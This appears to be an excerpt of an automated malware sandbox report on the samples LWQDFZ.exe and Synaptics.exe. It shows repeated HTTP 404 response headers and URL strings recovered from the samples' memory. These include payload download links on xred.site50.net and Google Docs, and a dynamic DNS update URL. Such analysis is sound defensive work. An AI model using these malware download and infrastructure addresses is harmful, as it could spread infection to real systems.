                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fgCE-izE8UJ3wqfSLfseAa0hRGqbhEua142We6KsOT-ahhgMeNgyrSZSzp4-V_-XaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:02 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-nirHLKwqxJuop_JKW-CfVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QxqiKOkZuS-UvkoUG3LrBF6IJSTDA_d9Dg18Kr_G9yeCRdvSQ_Ar5BfGXbGjJOVn8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-gT_lwTRXHIZ-OxIsoXAMiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6AfcXctw8OgvHTp0-bdh0lww4MbiM-dLV7SO4RBu8-O1T-QgFuZMF0R-jpMaiPp78aContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:03 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-e69MbAD3XGAf34Zo2TYf2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7VWe34AD78lPHMwQg7A1Tp3wGgJ7RG__3hoWE_iAhMeqWH6cHmGLnI74VSUWJK_vjpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-xugerl6kd424cCCaLfYDtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7L1mCsmc44ZvaSkVv1FsBpRw8pzGV1Zu7V6Feze5ZGhpV9Ah9zrUXpxuR4ZotRFgr0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pLjXBePujxr5eJvcEacDFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6eu9pUIOG1f-LIet5Si0jCOb38jTUN9qG5EV-e7MODv99GaXU9dIjnIR_JAkl_1hLvwq0OAU0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:07 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zZFtaERH-_gqlQzQIiVeCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5GtcmpD5rgeqP04MNWXXWxWyzwOcMBSe_GVuPnRCNg00-BOXyU0SomSPNEW9tZZDPpFaiqzF4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:07 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-5wSOqklru4bXM1wJhqAqXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC597P00JE0aqk-tNlVUuai51x2BlP6uVIAij4EHkRvlOLu1SbDrTs2_FHIY_pIogT7wKkABcEQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:08 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-ZxcGcWu8GRrh6KCa_Oye2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kiA2qeotdv_UzxtDj3ZIsSmrWZ8kfkfweN4vnP0rR6eh4cSyKLM2rZPXowDqUdcSZx5zn8vkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:08 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-o-zF1mSrLikNBAMxffJiZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4gWW4VTaedxZOPY5QyJNU8vEKGMMqbWGJCcmigr-OmiX0BA7oigwm8mSsGmQGoA2PvOpbB4wkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:10 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LB22-wJEW7JDl29SDfT8JA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5TaxdGLOhirVmrA_sSjpxU6cQMmnySR9JEH1VV1kEK1NM1m0z4exTcDvLzU6ijYoHfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:11 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-vmnX3CvdmIlTARhu5xdWmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4r806I9XJokqBxTplwhUH591rr67gxceKMsU9-ltwMzAx5AiONqiXEkhrWmr5-_kRQ6kgH3xAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:11 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-dgdTHJWqHRAOuwkadEGeYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6tjN5cGcj_8IenxJqLgjYTy4J_5lGG5c_in56fXS-gxNCC0qEJe2RCL_hdmrBGH6qPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:12 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-lInXM6olXXzfY9tD4Dst1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54mDgSj15XYrU4tE1iT8oxBfIckxn-a__SvM8BEHgLsQ0N1Fo2Gh5Bb4tkw4r0goxEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:12 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-IiBP-Aarz21RL2N0wLEqJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70NyhK6FJS7mJZ_DnGfdQrAbXuNtK7ieSNBH6r-ULFBpOgjGa0E1v9y9dSuKgdxol7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:26:31 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-E_0t0mU58XTeXALNvHUlIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: LWQDFZ.exeString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978_
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3036420870.00000000041C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/108392S17108385S17108460
                              Source: Amcache.hve.23.drString found in binary or memory: http://upx.sf.net
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: LWQDFZ.exeString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000072D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/googletagservices-cn.com
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/leclick-cn.net
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/t1.c
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0B
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: LWQDFZ.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: LWQDFZ.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#$
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#&
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#H
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$G
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$U
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%6
